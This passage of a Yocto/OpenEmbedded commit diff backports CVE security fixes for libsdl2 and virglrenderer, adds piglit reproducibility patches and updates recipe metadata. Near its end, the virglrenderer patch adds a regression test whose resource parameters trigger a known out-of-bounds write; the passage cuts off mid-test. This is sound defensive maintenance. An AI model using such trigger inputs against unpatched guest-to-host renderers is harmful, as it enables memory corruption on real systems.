++        pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
+     } else {
+-        pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
++        pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
+     }
+     pitch = (pitch + 3) & ~3;   /* 4-byte aligning for speed */
+     return pitch;
+@@ -59,11 +58,19 @@ SDL_Surface *
+ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+                                Uint32 format)
+ {
++    Sint64 pitch;
+     SDL_Surface *surface;
+ 
+     /* The flags are no longer used, make the compiler happy */
+     (void)flags;
+ 
++    pitch = SDL_CalculatePitch(format, width);
++    if (pitch < 0 || pitch > SDL_MAX_SINT32) {
++        /* Overflow... */
++        SDL_OutOfMemory();
++        return NULL;
++    }
++
+     /* Allocate the surface */
+     surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
+     if (surface == NULL) {
+@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+     }
+     surface->w = width;
+     surface->h = height;
+-    surface->pitch = SDL_CalculatePitch(format, width);
++    surface->pitch = (int)pitch;
+     SDL_SetClipRect(surface, NULL);
+ 
+     if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
+From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Tue, 30 Nov 2021 12:36:46 -0800
+Subject: [PATCH] Always create a full 256-entry map in case color values are
+ out of range
+
+Fixes https://github.com/libsdl-org/SDL/issues/5042
+
+CVE: CVE-2021-33657
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/video/SDL_pixels.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
+index ac04533c5d5..9bb02f771d0 100644
+--- a/src/video/SDL_pixels.c
++++ b/src/video/SDL_pixels.c
+@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
+         }
+         *identical = 0;
+     }
+-    map = (Uint8 *) SDL_malloc(src->ncolors);
++    map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
+     if (map == NULL) {
+         SDL_OutOfMemory();
+         return (NULL);
+@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
+     SDL_Palette *pal = src->palette;
+ 
+     bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
+-    map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
++    map = (Uint8 *) SDL_calloc(256, bpp);
+     if (map == NULL) {
+         SDL_OutOfMemory();
+         return (NULL);
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
+From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Wed, 21 Sep 2022 10:30:38 +0800
+Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
+
+
+CVE: CVE-2022-4743
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/render/opengles/SDL_render_gles.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
+index a5fbab309eda..ba08a46e2805 100644
+--- a/src/render/opengles/SDL_render_gles.c
++++ b/src/render/opengles/SDL_render_gles.c
+@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+     renderdata->glGenTextures(1, &data->texture);
+     result = renderdata->glGetError();
+     if (result != GL_NO_ERROR) {
++        if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++            SDL_free(data->pixels);
++        }
+         SDL_free(data);
+         return GLES_SetError("glGenTextures()", result);
+     }
+@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+ 
+     result = renderdata->glGetError();
+     if (result != GL_NO_ERROR) {
++        if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++            SDL_free(data->pixels);
++        }
+         SDL_free(data);
+         return GLES_SetError("glTexImage2D()", result);
+     }
diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index 1049aa548a..fa29bc99ac 100644
--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
            file://more-gen-depends.patch \
            file://directfb-spurious-curly-brace-missing-e.patch \
            file://directfb-renderfillrect-fix.patch \
+           file://CVE-2020-14409-14410.patch \
+           file://CVE-2021-33657.patch \
+           file://CVE-2022-4743.patch \
 "
 
 S = "${WORKDIR}/SDL2-${PV}"
@@ -57,7 +60,7 @@ PACKAGECONFIG ??= " \
 "
 PACKAGECONFIG[alsa]       = "--enable-alsa --disable-alsatest,--disable-alsa,alsa-lib,"
 PACKAGECONFIG[arm-neon]   = "--enable-arm-neon,--disable-arm-neon"
-PACKAGECONFIG[directfb]   = "--enable-video-directfb,--disable-video-directfb,directfb"
+PACKAGECONFIG[directfb]   = "--enable-video-directfb,--disable-video-directfb,directfb,directfb"
 PACKAGECONFIG[gles2]      = "--enable-video-opengles,--disable-video-opengles,virtual/libgles2"
 PACKAGECONFIG[jack]       = "--enable-jack,--disable-jack,jack"
 PACKAGECONFIG[kmsdrm]     = "--enable-video-kmsdrm,--disable-video-kmsdrm,libdrm virtual/libgbm"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
 
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
 SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
 S = "${WORKDIR}/git"
 
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
 
 # SRCREV tagged 1.2.2
 SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
            file://0001-Fix-build-with-gcc-10.patch \
            file://kbdconfig"
 
diff --git a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
index cd35a1f850..a64f2faa85 100644
--- a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
+++ b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
@@ -6,6 +6,21 @@ Subject: [PATCH] meson.build: make TLS ELF optional
 USE_ELF_TLS has replaced GLX_USE_TLS so this patch is the original "make
 TLS GLX optional again" patch updated to the latest mesa.
 
+For details, see:
+https://gitlab.freedesktop.org/mesa/mesa/-/issues/966
+
+This prevents runtime segfault on musl:
+
+Traceback (most recent call last):
+  File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/core/decorator/__init__.py", line 36, in wrapped_f
+    return func(*args, **kwargs)
+  File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/runtime/cases/parselogs.py", line 378, in test_parselogs
+    self.assertEqual(errcount, 0, msg=self.msg)
+AssertionError: 1 != 0 : Log: /home/pokybuild/yocto-worker/musl-qemux86/build/build/tmp/work/qemux86-poky-linux-musl/core-image-sato-sdk/1.0-r0/target_logs/Xorg.0.log
+-----------------------
+Central error: [    10.477] (EE) Failed to load /usr/lib/xorg/modules/extensions/libglx.so: Error relocating /usr/lib/libGL.so.1: alphasort: initial-exec TLS resolves to dynamic definition in /usr/lib/libGL.so.1
+***********************
+
 Upstream-Status: Inappropriate [configuration]
 Signed-off-by: Alistair Francis <alistair@alistair23.me>
 
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index b7ef496fdc..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -26,11 +26,6 @@ PROVIDES = " \
 
 inherit meson pkgconfig python3native gettext features_check
 
-# Unset these to stop python trying to report the target Python setup
-_PYTHON_SYSCONFIGDATA_NAME[unexport] = "1"
-STAGING_INCDIR[unexport] = "1"
-STAGING_LIBDIR[unexport] = "1"
-
 BBCLASSEXTEND = "native nativesdk"
 
 ANY_OF_DISTRO_FEATURES_class-target = "opengl vulkan"
@@ -236,7 +231,7 @@ python mesa_populate_packages() {
     import re
     dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
     if os.path.isdir(dri_drivers_root):
-        dri_pkgs = os.listdir(dri_drivers_root)
+        dri_pkgs = sorted(os.listdir(dri_drivers_root))
         lib_name = d.expand("${MLPREFIX}mesa-megadriver")
         for p in dri_pkgs:
             m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Very simple session manager for X"
+DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
 HOMEPAGE = "http://www.yoctoproject.org"
 BUGTRACKER = "http://bugzilla.pokylinux.org"
 
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
 # Exclude x.99.x versions from upstream checks
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
 
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
 	   file://fix-test-includes.patch \
 	  "
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
 SUMMARY = "Clutter based UI widget library"
+DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
+elements, including buttons, progress bars, scroll bars and others. It also \
+implements some standard  managers. One other interesting feature is the \
+possibility setting style properties from a CSS format file."
+HOMEPAGE = "https://github.com/clutter-project/mx"
+BUGTRACKER = "https://github.com/clutter-project/mx/issues"
 LICENSE = "LGPLv2.1"
 
 inherit clutter autotools features_check gobject-introspection gtk-doc
diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
+From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Sun, 1 Nov 2020 20:08:49 +0000
+Subject: [PATCH] Add a missing include for htobe32 definition
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+index 5f45e0c23..c755ee29a 100644
+--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+@@ -34,6 +34,8 @@
+ 
+ #include "piglit-util-gl.h"
+ 
++#include <endian.h>
++
+ #define IMAGE_WIDTH 60
+ #define IMAGE_HEIGHT 60
+ 
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
+From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 30 Nov 2020 23:08:22 +0000
+Subject: [PATCH] framework/profile.py: make test lists reproducible
+
+These are created with os.walk, which yields different
+order depending on where it's run.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ framework/profile.py | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/framework/profile.py b/framework/profile.py
+index c210e535e..9b5d51d68 100644
+--- a/framework/profile.py
++++ b/framework/profile.py
+@@ -528,7 +528,11 @@ class TestProfile(object):
+                 else:
+                     opts[n] = self.test_list[n]
+         else:
+-            opts = self.test_list  # pylint: disable=redefined-variable-type
++            opts = collections.OrderedDict()
++            test_keys = list(self.test_list.keys())
++            test_keys.sort()
++            for k in test_keys:
++                opts[k] = self.test_list[k]
+ 
+         for k, v in self.filters.run(opts.items()):
+             yield k, v
diff --git a/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
new file mode 100644
index 0000000000..8704f98500
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+             relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+             """)
+ 
+-        test = test.format(self=self, generator_command=" ".join(sys.argv))
++        test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+ 
+         filename = self.filename()
+         dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+             relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+             """)
+ 
+-        test = test.format(self=self, generator_command=" ".join(sys.argv))
++        test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+ 
+         filename = self.filename()
+         dirname = os.path.dirname(filename)
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+                 et.SubElement(env, 'env', name=k, value=v)
+ 
+     tree = et.ElementTree(root)
+-    with gzip.open(outfile, 'wb') as f:
++    reproducible_mtime = None
++    if 'SOURCE_DATE_EPOCH' in os.environ:
++        reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++    with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+         tree.write(f, encoding='utf-8', xml_declaration=True)
+ 
+ 
diff --git a/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+     assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+ 
+-    # We'll end up with a list of tuples, split that into two lists
++    # This makes the xml output reproducible, as os.walk() order is random
++    files.sort()
++    # We'll end up with a list of tuples, split that into two list
+     files, installedfiles = list(zip(*files))
+     files = list(files)
+     installedfiles = list(installedfiles)
diff --git a/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibilty.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+ 
+ 	source_dir = getenv("PIGLIT_SOURCE_DIR");
+ 	if (source_dir == NULL) {
+-		source_dir = SOURCE_DIR;
++		source_dir = ".";
+ 	}
+ 
+ 	snprintf(filename_with_path, FILENAME_MAX - 1,
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
 SUMMARY = "OpenGL driver testing framework"
 DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
 implementations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
 LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
 
-SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
            file://0001-cmake-install-bash-completions-in-the-right-place.patch \
            file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
+           file://0001-Add-a-missing-include-for-htobe32-definition.patch \
+           file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
+           file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
+           file://0001-serializer.py-make-.gz-files-reproducible.patch \
+           file://0001-framework-profile.py-make-test-lists-reproducible.patch \
+           file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
            "
 UPSTREAM_CHECK_COMMITS = "1"
 
-SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813"
+SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
 # (when PV goes above 1.0 remove the trailing r)
 PV = "1.0+gitr${SRCPV}"
 
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
 PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
 PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
 PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
+PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
 
+export PIGLIT_BUILD_DIR = "../../../../git"
 
 do_configure_prepend() {
    if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
 SUMMARY = "Enables monitoring and display of application startup"
+DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
+The reference implementation is mostly under an X Window System style license, and has \
+no special dependencies. "
 HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
-BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications"
+BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
 
 # most files are under MIT, but libsn/sn-util.c is under LGPL, the
 # effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
 SUMMARY = "The Bitstream Vera fonts - TTF Edition"
+HOMEPAGE = "https://www.gnome.org/fonts/"
 DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
 faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
 and bold).  In addition Fontconfig/Xft2 can artificially oblique the \
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
new file mode 100644
index 0000000000..4a277bd4d0
--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
+From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
+From: Gert Wollny <gert.wollny@collabora.com>
+Date: Tue, 30 Nov 2021 10:17:26 +0100
+Subject: [PATCH] vrend: Add test to resource OOB write and fix it
+
+v2: Also check that no depth != 1 has been send when none is due
+
+Closes: #250
+Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
+Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
+
+https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
+Upstream-Status: Backport
+CVE: CVE-2022-0135
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/vrend_renderer.c        |  3 +++
+ tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 46 insertions(+)
+
+diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
+index 28f669727..357b81b20 100644
+--- a/src/vrend_renderer.c
++++ b/src/vrend_renderer.c
+@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
+                                           info->box->height) * elsize;
+       if (res->target == GL_TEXTURE_3D ||
+           res->target == GL_TEXTURE_2D_ARRAY ||
++          res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
+           res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
+           send_size *= info->box->depth;
++      else if (need_temp && info->box->depth != 1)
++         return EINVAL;
+ 
+       if (need_temp) {
+          data = malloc(send_size);
+diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
+index 59d6fb671..2de9a9a3f 100644
+--- a/tests/test_fuzzer_formats.c
++++ b/tests/test_fuzzer_formats.c
+@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
+     virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
+ }
+ 
++/* Test adapted from yaojun8558363@gmail.com:
++ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
++*/
++static void test_vrend_3d_resource_overflow() {
++
++    struct virgl_renderer_resource_create_args resource;
++    resource.handle = 0x4c474572;
++    resource.target = PIPE_TEXTURE_2D_ARRAY;
++    resource.format = VIRGL_FORMAT_Z24X8_UNORM;
++    resource.nr_samples = 2;
++    resource.last_level = 0;
++    resource.array_size = 3;
++    resource.bind = VIRGL_BIND_SAMPLER_VIEW;
++    resource.depth = 1;
++    resource.width = 8;
++    resource.height = 4;
++    resource.flags = 0;
++
